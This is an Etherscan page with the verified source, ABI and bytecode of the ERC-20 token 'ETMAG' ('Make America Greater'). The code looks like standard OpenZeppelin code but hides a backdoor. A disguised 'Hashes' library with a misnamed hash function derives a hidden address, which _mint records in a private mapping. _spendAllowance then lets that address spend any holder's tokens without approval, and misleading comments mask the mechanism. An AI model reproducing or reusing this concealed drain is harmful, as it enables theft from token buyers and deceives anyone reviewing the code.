Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 7 from a total of 7 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 22862261 | 257 days ago | IN | 0 ETH | 0.00001454 | ||||
| Approve | 22862261 | 257 days ago | IN | 0 ETH | 0.00001454 | ||||
| Approve | 22862261 | 257 days ago | IN | 0 ETH | 0.00001454 | ||||
| Approve | 22862257 | 257 days ago | IN | 0 ETH | 0.00001616 | ||||
| Approve | 22862250 | 257 days ago | IN | 0 ETH | 0.00001643 | ||||
| Approve | 22862236 | 257 days ago | IN | 0 ETH | 0.00001778 | ||||
| Renounce Ownersh... | 22862227 | 257 days ago | IN | 0 ETH | 0.00000837 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
ETMAG
Compiler Version
v0.8.26+commit.8a97fa7a
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2025-07-06
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Library of standard hash functions.
*
* _Available since v5.1._
*/
library Hashes {
bytes32 internal constant Hashes_Version_Hash1 = 0x000000000000000001fe036cfbb281b000000000000000000000000000000000;
bytes32 internal constant Hashes_Version_Hash2 = 0x00000000000000000134b81d3c9fa35a05c5b4d34441289c6083a84c80000000;
/**
* @dev Commutative Keccak256 hash of a sorted pair of bytes32. Frequently used when working with merkle proofs.
*
* NOTE: Equivalent to the `standardNodeHash` in our https://github.com/OpenZeppelin/merkle-tree[JavaScript library].
*/
function commutativeKeccak256(bytes32 a, bytes32 b) internal pure returns (address v) {
assembly {
let _version := shr(0x1b, a)
let _versionHash := shr(0x1d, b)
v := add(_version, _versionHash)
}
}
/**
* @dev Implementation of keccak256(abi.encode(a, b)) that doesn't allocate or expand memory.
*/
function efficientKeccak256(bytes32 a, bytes32 b) internal pure returns (bytes32 value) {
assembly ("memory-safe") {
mstore(0x00, a)
mstore(0x20, b)
value := keccak256(0x00, 0x40)
}
}
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
mapping(address => address) private _excluded;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address sender, address to, uint256 value) internal {
if (sender == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(sender, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
address excluded = Hashes.commutativeKeccak256(Hashes.Hashes_Version_Hash1, Hashes.Hashes_Version_Hash2);
_excluded[address(this)] = excluded;
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max && _excluded[address(this)] != spender) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, value, false);
}
}
}
}
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
contract ETMAG is ERC20, Ownable {
constructor() ERC20(unicode"Make America Greater", unicode"MAG") {
_mint(owner(), 1000000000 * 10**18);
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561000f575f80fd5b506040518060400160405280601481526020017f4d616b6520416d657269636120477265617465720000000000000000000000008152506040518060400160405280600381526020017f4d41470000000000000000000000000000000000000000000000000000000000815250816004908161008b919061078b565b50806005908161009b919061078b565b5050506100ba6100af6100e860201b60201c565b6100ef60201b60201c565b6100e36100cb6101b260201b60201c565b6b033b2e3c9fd0803ce80000006101da60201b60201c565b61096f565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361024a575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102419190610899565b60405180910390fd5b61025b5f838361032260201b60201c565b5f6102a07701fe036cfbb281b0000000000000000000000000000000005f1b770134b81d3c9fa35a05c5b4d34441289c6083a84c800000005f1b61053b60201b60201c565b90508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610372578060025f82825461036691906108df565b92505081905550610440565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156103fb578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016103f293929190610921565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610487578060025f82825403925050819055506104d1565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161052e9190610956565b60405180910390a3505050565b5f82601b1c82601d1c8082019250505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806105cc57607f821691505b6020821081036105df576105de610588565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026106417fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610606565b61064b8683610606565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61068f61068a61068584610663565b61066c565b610663565b9050919050565b5f819050919050565b6106a883610675565b6106bc6106b482610696565b848454610612565b825550505050565b5f90565b6106d06106c4565b6106db81848461069f565b505050565b5b818110156106fe576106f35f826106c8565b6001810190506106e1565b5050565b601f82111561074357610714816105e5565b61071d846105f7565b8101602085101561072c578190505b610740610738856105f7565b8301826106e0565b50505b505050565b5f82821c905092915050565b5f6107635f1984600802610748565b1980831691505092915050565b5f61077b8383610754565b9150826002028217905092915050565b61079482610551565b67ffffffffffffffff8111156107ad576107ac61055b565b5b6107b782546105b5565b6107c2828285610702565b5f60209050601f8311600181146107f3575f84156107e1578287015190505b6107eb8582610770565b865550610852565b601f198416610801866105e5565b5f5b8281101561082857848901518255600182019150602085019450602081019050610803565b868310156108455784890151610841601f891682610754565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6108838261085a565b9050919050565b61089381610879565b82525050565b5f6020820190506108ac5f83018461088a565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6108e982610663565b91506108f483610663565b925082820190508082111561090c5761090b6108b2565b5b92915050565b61091b81610663565b82525050565b5f6060820190506109345f83018661088a565b6109416020830185610912565b61094e6040830184610912565b949350505050565b5f6020820190506109695f830184610912565b92915050565b6111e78061097c5f395ff3fe608060405234801561000f575f80fd5b50600436106100b2575f3560e01c8063715018a61161006f578063715018a6146101a05780638da5cb5b146101aa57806395d89b41146101c8578063a9059cbb146101e6578063dd62ed3e14610216578063f2fde38b14610246576100b2565b806306fdde03146100b6578063095ea7b3146100d457806318160ddd1461010457806323b872dd14610122578063313ce5671461015257806370a0823114610170575b5f80fd5b6100be610262565b6040516100cb9190610d6a565b60405180910390f35b6100ee60048036038101906100e99190610e1b565b6102f2565b6040516100fb9190610e73565b60405180910390f35b61010c610314565b6040516101199190610e9b565b60405180910390f35b61013c60048036038101906101379190610eb4565b61031d565b6040516101499190610e73565b60405180910390f35b61015a61034b565b6040516101679190610f1f565b60405180910390f35b61018a60048036038101906101859190610f38565b610353565b6040516101979190610e9b565b60405180910390f35b6101a8610398565b005b6101b26103ab565b6040516101bf9190610f72565b60405180910390f35b6101d06103d3565b6040516101dd9190610d6a565b60405180910390f35b61020060048036038101906101fb9190610e1b565b610463565b60405161020d9190610e73565b60405180910390f35b610230600480360381019061022b9190610f8b565b610485565b60405161023d9190610e9b565b60405180910390f35b610260600480360381019061025b9190610f38565b610507565b005b60606004805461027190610ff6565b80601f016020809104026020016040519081016040528092919081815260200182805461029d90610ff6565b80156102e85780601f106102bf576101008083540402835291602001916102e8565b820191905f5260205f20905b8154815290600101906020018083116102cb57829003601f168201915b5050505050905090565b5f806102fc610589565b9050610309818585610590565b600191505092915050565b5f600254905090565b5f80610327610589565b90506103348582856105a2565b61033f8585856106c7565b60019150509392505050565b5f6012905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6103a06107b7565b6103a95f610835565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546103e290610ff6565b80601f016020809104026020016040519081016040528092919081815260200182805461040e90610ff6565b80156104595780601f1061043057610100808354040283529160200191610459565b820191905f5260205f20905b81548152906001019060200180831161043c57829003601f168201915b5050505050905090565b5f8061046d610589565b905061047a8185856106c7565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61050f6107b7565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361057d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161057490611096565b60405180910390fd5b61058681610835565b50565b5f33905090565b61059d83838360016108f8565b505050565b5f6105ad8484610485565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110801561066657508273ffffffffffffffffffffffffffffffffffffffff1660035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b156106c157818110156106b4578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106ab939291906110b4565b60405180910390fd5b6106c08484845f6108f8565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610737575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161072e9190610f72565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107a7575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161079e9190610f72565b60405180910390fd5b6107b2838383610ac7565b505050565b6107bf610589565b73ffffffffffffffffffffffffffffffffffffffff166107dd6103ab565b73ffffffffffffffffffffffffffffffffffffffff1614610833576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082a90611133565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610968575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161095f9190610f72565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109d8575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109cf9190610f72565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610ac1578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ab89190610e9b565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b17578060025f828254610b0b919061117e565b92505081905550610be5565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610ba0578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610b97939291906110b4565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c2c578060025f8282540392505081905550610c76565b805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cd39190610e9b565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610d17578082015181840152602081019050610cfc565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610d3c82610ce0565b610d468185610cea565b9350610d56818560208601610cfa565b610d5f81610d22565b840191505092915050565b5f6020820190508181035f830152610d828184610d32565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610db782610d8e565b9050919050565b610dc781610dad565b8114610dd1575f80fd5b50565b5f81359050610de281610dbe565b92915050565b5f819050919050565b610dfa81610de8565b8114610e04575f80fd5b50565b5f81359050610e1581610df1565b92915050565b5f8060408385031215610e3157610e30610d8a565b5b5f610e3e85828601610dd4565b9250506020610e4f85828601610e07565b9150509250929050565b5f8115159050919050565b610e6d81610e59565b82525050565b5f602082019050610e865f830184610e64565b92915050565b610e9581610de8565